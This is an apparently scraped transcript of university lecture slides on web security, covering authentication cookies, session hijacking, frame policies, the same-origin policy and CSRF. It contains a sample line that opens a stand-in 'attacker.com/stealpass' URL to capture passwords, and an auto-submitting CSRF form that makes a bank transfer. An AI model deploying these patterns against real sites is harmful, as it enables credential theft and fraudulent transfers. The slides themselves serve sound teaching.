websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today authentication cookies +...
TRANSCRIPT
![Page 1: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/1.jpg)
![Page 3: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/3.jpg)
todayAuthentication cookies + session hijacking
Browser security model, frame policies
Cross-site request forgery
Announcement: No class on Wednesday, Feb 17
![Page 4: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/4.jpg)
review
![Page 5: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/5.jpg)
web ecosystem
Browser
http://linkedin.com
linkedin.comtcp/ip[tls?]http
html +css +javascript+ajax / websockets
web server -- nginx, apache, ... app server -- ruby, php, django, asp, node.js, ...
datastore -- sql, nosql, ...
![Page 6: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/6.jpg)
domFrom http://w3schools.com/htmldom/default.asp
Document object model (DOM) Object-oriented way to organize objects in a web page
Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]
Methods: document.write(document.referrer)
![Page 7: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/7.jpg)
browser security model
Should be safe to visit a malicious website
Should be safe to visit multiple websites simultaneously
Should be safe to delegate content
![Page 8: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/8.jpg)
browser vs os
Browser handles multiple sites, must maintain separate security contexts for each
Primitives / System calls / Processes / Files
Principals: Users, groups
Vulnerabilities / Buffer overflows / Privilege escalation / ...
Primitives / Document obj model / Frames / Cookies, pws
Principals: Origins
Vulnerabilities / Cross-site scripting (XSS) / Cross-site req forgery (XSRF) / ...
Operating System Browser
![Page 9: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/9.jpg)
cookies
![Page 10: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/10.jpg)
cookies
Browser
GET …
HTTP Header: Set-cookie: NAME=value; domain = (when to send); path = (when to send); secure = (only send over SSL); expires = (when expires);
website.com
- Cookies permit browsers to store state associated with a website
![Page 11: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/11.jpg)
![Page 12: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/12.jpg)
auth cookies
Browser
website.com
HTTP/1.1 200 OK Set-Cookie:auth=981mndg897asdfd
db.users.insert({ username:"user", auth-cookie:981mnd89..., login:true, })
POST /login.html HTTP/1.1 username=user&passwd=pass
GET /index.html HTTP/1.1 Cookie: auth=981mndg897asdfd
![Page 13: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/13.jpg)
cookie security issuesWhat could possibly go wrong?
Integrity problems / HTTPS cookies can be overwritten by HTTP cookies / Malicious clients can modify cookies
Scoping rues can be abused / blog.example.com can read/set cookies for example.com
Privacy: Cookies can be used to track individuals around the internet
HTTP auth cookies sent without encryption -- session hijacking
![Page 14: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/14.jpg)
firesheep
Firesheep steals session authentication cookies==> session hijacking
![Page 15: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/15.jpg)
frame policies
![Page 16: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/16.jpg)
javascript contexts
•
•
•
JavaScript context 1
JavaScript context 2
JavaScript context 3
[slide credit: V. Shmatikov, CS380]
![Page 17: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/17.jpg)
dom access control
JavaScript Context
DOM Reference Monitor
Access?
Object
Object reference Is this context
allowed to access object?
[slide credit: V. Shmatikov, CS380]
JavaScript ContextObject ref
![Page 18: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/18.jpg)
frame relationships
Child
Sibling
Descendant
Ancestor
![Page 19: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/19.jpg)
frame policiescanScript(A,B) / Can frame A execute a script that manipulates arbitrary DOM elements in frame B?
canNavigate(A,B) / Can frame A change the origin of content for frame B?
/frameB.src = "http://newurl.com/page5.html"
![Page 20: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/20.jpg)
same-origin policyEach frame within a page has an origin / example: https://fb.com:99/login.js / Origin is: (protocol, host, port)
Same-origin policy:canScript(A,B)only when origin(A) == origin(B)
JavaScript origin: based on containing frame, not <script src>
What about canNavigate(A,B) ?
![Page 21: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/21.jpg)
frame policies
Permissive / any frame can navigate any other frame
Child / can only navigate another frame if you are a parent
Descendant / can only navigate another frame if you are an ancestor
canNavigate(A,B)
Which policy should be used?
think-pair-share
![Page 22: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/22.jpg)
legacy browsers
Browser Policy
IE 6 (default) Permissive
IE 6 (option) Child
IE7 (default) Descendant
IE7 (with Flash) Permissive
Firefox 2 Window
Safari 3 Permissive
Opera 9 Window
HTML 6 Child
![Page 23: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/23.jpg)
permissive problems
awglogin
window.open("https://attacker.com/stealpass", awglogin);
![Page 24: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/24.jpg)
descendant policy
Browser Policy
IE7 (default) Descendant
IE7 (with Flash) Descendant
Firefox 2 Descendant
Safari 3 Descendant
Opera 9 (multiple)
HTML 6 Descendant
![Page 25: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/25.jpg)
XSRF
![Page 26: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/26.jpg)
attack
bank.com
login:user/pw
cookie:sessionId=b98fjhw7; bank.com; secure
GET /blog HTTP/1.1
blog.com
<form action=https://bank.com/transfer method=POST target=invisibleFrame> <input name=recipient value=attacker/> <input name=amount value=100USD/> </form> <script>document.forms[0].submit()</script>
POST /transfer HTTP/1.1 recipient=attacker&amount=100USD Cookie: sessionId=b98fjhw7
HTTP/1.1 200 OK <html>Transfer completed</html>
User CredentialsAttack called: Cross-site request forgery
XSRF or CSRF
![Page 27: websec-2pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today Authentication cookies + session hijacking Browser security model, frame policies Cross-site request forgery Announcement:](https://reader035.vdocuments.mx/reader035/viewer/2022062507/5fda598def31e309b55ce9d9/html5/thumbnails/27.jpg)
recap
Authentication cookies and session hijacking
JavaScript contexts, frame-policies
Problems with permissive policies
Cross-site request forgery
No class on Wednesday: see you next Monday; good luck on assignment one!